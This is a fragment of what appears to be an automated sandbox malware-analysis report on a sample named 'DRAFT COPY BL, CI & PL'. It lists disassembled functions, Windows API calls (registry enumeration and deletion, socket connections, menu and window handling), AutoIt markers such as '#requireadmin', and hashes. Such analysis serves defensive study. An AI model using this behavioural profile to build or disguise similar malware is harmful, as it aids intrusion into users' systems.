                                                                • _memset.LIBCMT ref: 009B72AA
                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009B7351
                                                                • IsMenu.USER32(?), ref: 009B7369
                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009B73B1
                                                                • DrawMenuBar.USER32 ref: 009B73C4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Menu$Item$DrawInfoInsert_memset
                                                                • String ID: 0
                                                                • API String ID: 3866635326-4108050209
                                                                • Opcode ID: 2427a83819d0e578a9a306e96fdd0ede30216196d3d59c44534bc7aa6230be86
                                                                • Instruction ID: 7989fda274db879c38e947ed7b79cad858d9775651a6f8b18d05d440025e68a0
                                                                • Opcode Fuzzy Hash: 2427a83819d0e578a9a306e96fdd0ede30216196d3d59c44534bc7aa6230be86
                                                                • Instruction Fuzzy Hash: D7411875A04208AFDB20DFA4E984AEABBF8FB44360F148629FD1597250D730AD50EF50
                                                                Function 009B0FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 009B0FD4
                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009B0FFE
                                                                • FreeLibrary.KERNEL32(00000000), ref: 009B10B5
                                                                  • Part of subcall function 009B0FA5: RegCloseKey.ADVAPI32(?), ref: 009B101B
                                                                  • Part of subcall function 009B0FA5: FreeLibrary.KERNEL32(?), ref: 009B106D
                                                                  • Part of subcall function 009B0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 009B1090
                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 009B1058
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                • String ID:
                                                                • API String ID: 395352322-0
                                                                • Opcode ID: 865392e93791a267735fde58d4fb553533b909234010f73060a9aec5b4ebdb55
                                                                • Instruction ID: 18a1028fda1c7776a73c283c12966b34372a6d1e3b9bdb0facec0aa221e7c39f
                                                                • Opcode Fuzzy Hash: 865392e93791a267735fde58d4fb553533b909234010f73060a9aec5b4ebdb55
                                                                • Instruction Fuzzy Hash: 39312D71910109BFDB15AF94DD99EFFB7BCEF08320F40026AF501A2151EB749E859AA0
                                                                Function 009B62CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 009B62EC
                                                                • GetWindowLongW.USER32(00E85388,000000F0), ref: 009B631F
                                                                • GetWindowLongW.USER32(00E85388,000000F0), ref: 009B6354
                                                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 009B6386
                                                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009B63B0
                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 009B63C1
                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009B63DB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: LongWindow$MessageSend
                                                                • String ID:
                                                                • API String ID: 2178440468-0
                                                                • Opcode ID: f90f35b3ace52f58d291c94d0b0519b4a82cf6edf8962e2ca70c1e71fdaefd05
                                                                • Instruction ID: 0deee3667fc33a0b36623f30aeb278b8acaa909145c3dbe66815213a9fad39e8
                                                                • Opcode Fuzzy Hash: f90f35b3ace52f58d291c94d0b0519b4a82cf6edf8962e2ca70c1e71fdaefd05
                                                                • Instruction Fuzzy Hash: B431F230658555DFDB208F18DE84FA43BE5FB4A764F1902A8FA018B2B1CB75B840EB50
                                                                Function 0098DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0098DB2E
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0098DB54
                                                                • SysAllocString.OLEAUT32(00000000), ref: 0098DB57
                                                                • SysAllocString.OLEAUT32(?), ref: 0098DB75
                                                                • SysFreeString.OLEAUT32(?), ref: 0098DB7E
                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 0098DBA3
                                                                • SysAllocString.OLEAUT32(?), ref: 0098DBB1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                • String ID:
                                                                • API String ID: 3761583154-0
                                                                • Opcode ID: 41140ae826fead657651e8665d814d65d3a1b05ab6c9e52160ce1e27ca2c2ef5
                                                                • Instruction ID: 1a595a13f92625d2abc41c78bec84a1ec37e027b16cbe428f23f3b275333d38e
                                                                • Opcode Fuzzy Hash: 41140ae826fead657651e8665d814d65d3a1b05ab6c9e52160ce1e27ca2c2ef5
                                                                • Instruction Fuzzy Hash: 8B219036605219AFDF10EFA9DC88CBB77ADEB09360B018635F914DB2A0D674DC4597A0
                                                                Function 009A6173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 009A7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009A7DB6
                                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009A61C6
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 009A61D5
                                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 009A620E
                                                                • connect.WSOCK32(00000000,?,00000010), ref: 009A6217
                                                                • WSAGetLastError.WSOCK32 ref: 009A6221
                                                                • closesocket.WSOCK32(00000000), ref: 009A624A
                                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 009A6263
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                • String ID:
                                                                • API String ID: 910771015-0
                                                                • Opcode ID: 7ebc950780124a9503dd545d05e8c680e9acab1c35566913e6c66eb140bc452c
                                                                • Instruction ID: 4fe12bc402673752b8043974857c5583914a68ed5b7176a108b88587d2be4a56
                                                                • Opcode Fuzzy Hash: 7ebc950780124a9503dd545d05e8c680e9acab1c35566913e6c66eb140bc452c
                                                                • Instruction Fuzzy Hash: AA31AF31604108ABDF10AF64CC85FBE7BACEB86720F084169FD15E7291DB74AC049BA1
                                                                Function 0098F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: __wcsnicmp
                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                • API String ID: 1038674560-2734436370
                                                                • Opcode ID: dc0380d0e8efa0bb6fe30bff9675878f714e3cd4f7f11688dabf4c643edfebd4
                                                                • Instruction ID: 6fcbe64fbbbd1858ca2c34b37add9b8d15c7c65d70b8b683c9a30d7c35bc1c6a
                                                                • Opcode Fuzzy Hash: dc0380d0e8efa0bb6fe30bff9675878f714e3cd4f7f11688dabf4c643edfebd4
                                                                • Instruction Fuzzy Hash: 7021767260421666E620FB34AC23FA7739CEFD9348F10943AF84687291FBA09D45C3A5
                                                                Function 0098DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0098DC09
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0098DC2F
                                                                • SysAllocString.OLEAUT32(00000000), ref: 0098DC32
                                                                • SysAllocString.OLEAUT32 ref: 0098DC53
                                                                • SysFreeString.OLEAUT32 ref: 0098DC5C
                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 0098DC76
                                                                • SysAllocString.OLEAUT32(?), ref: 0098DC84
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                • String ID:
                                                                • API String ID: 3761583154-0
                                                                • Opcode ID: 150ce2cafa36c51a7fcce46e1bfcd9ef1341269e6d5aadaf800001164ee5004c
                                                                • Instruction ID: 57b674f600562041401dab7972053c4c6f4af1f62a93c1e6a6e231c39bdfd32e
                                                                • Opcode Fuzzy Hash: 150ce2cafa36c51a7fcce46e1bfcd9ef1341269e6d5aadaf800001164ee5004c
                                                                • Instruction Fuzzy Hash: C2218035609204AF9B10FFA8DD88DAB77EDEB48360B108225F954CB3A0DAB4DD41DB64
                                                                Function 009B75CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00931D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00931D73
                                                                  • Part of subcall function 00931D35: GetStockObject.GDI32(00000011), ref: 00931D87
                                                                  • Part of subcall function 00931D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00931D91
                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 009B7632
                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 009B763F
                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 009B764A
                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 009B7659
                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 009B7665
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                • String ID: Msctls_Progress32
                                                                • API String ID: 1025951953-3636473452
                                                                • Opcode ID: 16e4f49886d3a440b4a8d50d4cd095b7c180219cda1630ae0a03af60869d0a09
                                                                • Instruction ID: f3504ca51907d61081657bf8dabc5841b566aca77abf64dc4df66fbc52ac94e6
                                                                • Opcode Fuzzy Hash: 16e4f49886d3a440b4a8d50d4cd095b7c180219cda1630ae0a03af60869d0a09
                                                                • Instruction Fuzzy Hash: 7911B6B111421DBFEF159F64CC85EE7BF5DEF487A8F014215BB04A60A0CA729C21DBA4
                                                                Function 00959AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __init_pointers.LIBCMT ref: 00959AE6
                                                                  • Part of subcall function 00953187: EncodePointer.KERNEL32(00000000), ref: 0095318A
                                                                  • Part of subcall function 00953187: __initp_misc_winsig.LIBCMT ref: 009531A5
                                                                  • Part of subcall function 00953187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00959EA0
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00959EB4
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00959EC7
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00959EDA
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00959EED
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00959F00
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00959F13
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00959F26
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00959F39
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00959F4C
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00959F5F
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00959F72
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00959F85
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00959F98
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00959FAB
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00959FBE
                                                                • __mtinitlocks.LIBCMT ref: 00959AEB
                                                                • __mtterm.LIBCMT ref: 00959AF4
                                                                  • Part of subcall function 00959B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00959AF9,00957CD0,009EA0B8,00000014), ref: 00959C56
                                                                  • Part of subcall function 00959B5C: _free.LIBCMT ref: 00959C5D
                                                                  • Part of subcall function 00959B5C: DeleteCriticalSection.KERNEL32(009EEC00,?,?,00959AF9,00957CD0,009EA0B8,00000014), ref: 00959C7F
                                                                • __calloc_crt.LIBCMT ref: 00959B19
                                                                • __initptd.LIBCMT ref: 00959B3B
                                                                • GetCurrentThreadId.KERNEL32 ref: 00959B42
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                • String ID:
                                                                • API String ID: 3567560977-0
                                                                • Opcode ID: 0fde95bb4b3f804d0eb371f8cb65d0176b0eacb418623c1553d8f5fe1d9d30a6
                                                                • Instruction ID: 6db70fb12665528a1020497e35cc797a162f449065462b86f94c8451084b9853
                                                                • Opcode Fuzzy Hash: 0fde95bb4b3f804d0eb371f8cb65d0176b0eacb418623c1553d8f5fe1d9d30a6
                                                                • Instruction Fuzzy Hash: 73F06D3251E711DAF624F77BBC0374A2698DB82736B204A19FC64D90D2FE20984943A0
                                                                Function 0095406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00953F85), ref: 00954085
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0095408C
                                                                • EncodePointer.KERNEL32(00000000), ref: 00954097
                                                                • DecodePointer.KERNEL32(00953F85), ref: 009540B2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                • String ID: RoUninitialize$combase.dll
                                                                • API String ID: 3489934621-2819208100
                                                                • Opcode ID: 03f59e9d93d4f922acb728be89bb3d9c298cd1411a522cc555ed20de55d39318
                                                                • Instruction ID: bdf91a35fd00cdf5c9cb69aa2f0f74e197c28f233c1d4bc992448ee0de062015
                                                                • Opcode Fuzzy Hash: 03f59e9d93d4f922acb728be89bb3d9c298cd1411a522cc555ed20de55d39318
                                                                • Instruction Fuzzy Hash: BAE04F7066C301EFDB509F71ED0CB153AA8B710796F108128F511D10E0CB7A5684EB01
                                                                Function 00931DB3 Relevance: 9.3, APIs: 6, Instructions: 254COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetClientRect.USER32(?,?), ref: 00931DDC
                                                                • GetWindowRect.USER32(?,?), ref: 00931E1D
                                                                • ScreenToClient.USER32(?,?), ref: 00931E45
                                                                • GetClientRect.USER32(?,?), ref: 00931F74
                                                                • GetWindowRect.USER32(?,?), ref: 00931F8D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Rect$Client$Window$Screen
                                                                • String ID:
                                                                • API String ID: 1296646539-0
                                                                • Opcode ID: b1a40f0f64b74e7739e8a627587f7c398b0cc55615cd026a17ef2032c4225106
                                                                • Instruction ID: 242571ce9fa0ab5c025de2ba832142996ac0e0d0ed41cdb54699a82a55d62ba2
                                                                • Opcode Fuzzy Hash: b1a40f0f64b74e7739e8a627587f7c398b0cc55615cd026a17ef2032c4225106
                                                                • Instruction Fuzzy Hash: 02B1397990024ADBDB10CFA9C5807EEB7B5FF08310F149529EC59DB264EB34AA90DF54
                                                                Function 009964B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _memmove$__itow__swprintf
                                                                • String ID:
                                                                • API String ID: 3253778849-0
                                                                • Opcode ID: 8d95ba5007d8cc28eb6b142bf0a73089b308e5a7fb3111f813861fb28a5229a8
                                                                • Instruction ID: 4a05c7e9566e1f28b2809b96d63cc7ae2af11f0f1bcfc2fe2e6b50662fc70364
                                                                • Opcode Fuzzy Hash: 8d95ba5007d8cc28eb6b142bf0a73089b308e5a7fb3111f813861fb28a5229a8
                                                                • Instruction Fuzzy Hash: E1619A3050025A9BCF12EF68CC82FFE77A9AF85308F054919FC596B292DB75E909CB50
                                                                Function 009B01E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                  • Part of subcall function 009B0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009AFDAD,?,?), ref: 009B0E31
                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009B02BD
                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009B02FD
                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 009B0320
                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 009B0349
                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 009B038C
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 009B0399
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                • String ID:
                                                                • API String ID: 4046560759-0
                                                                • Opcode ID: fda15b3af92a314381ddb40e6302469dc5437d75dae4dd626aea226f8a9df580
                                                                • Instruction ID: e332f188b810cead0f68e870318b65fc6490ff8c4b8a5aaa5b084b7a9852b558
                                                                • Opcode Fuzzy Hash: fda15b3af92a314381ddb40e6302469dc5437d75dae4dd626aea226f8a9df580
                                                                • Instruction Fuzzy Hash: CA512771108204AFC714EB64C999EAFBBE9EFC9324F04491DF4558B2A2DB31E909CB52
                                                                Function 009B5799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetMenu.USER32(?), ref: 009B57FB
                                                                • GetMenuItemCount.USER32(00000000), ref: 009B5832
                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 009B585A
                                                                • GetMenuItemID.USER32(?,?), ref: 009B58C9
                                                                • GetSubMenu.USER32(?,?), ref: 009B58D7
                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 009B5928
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
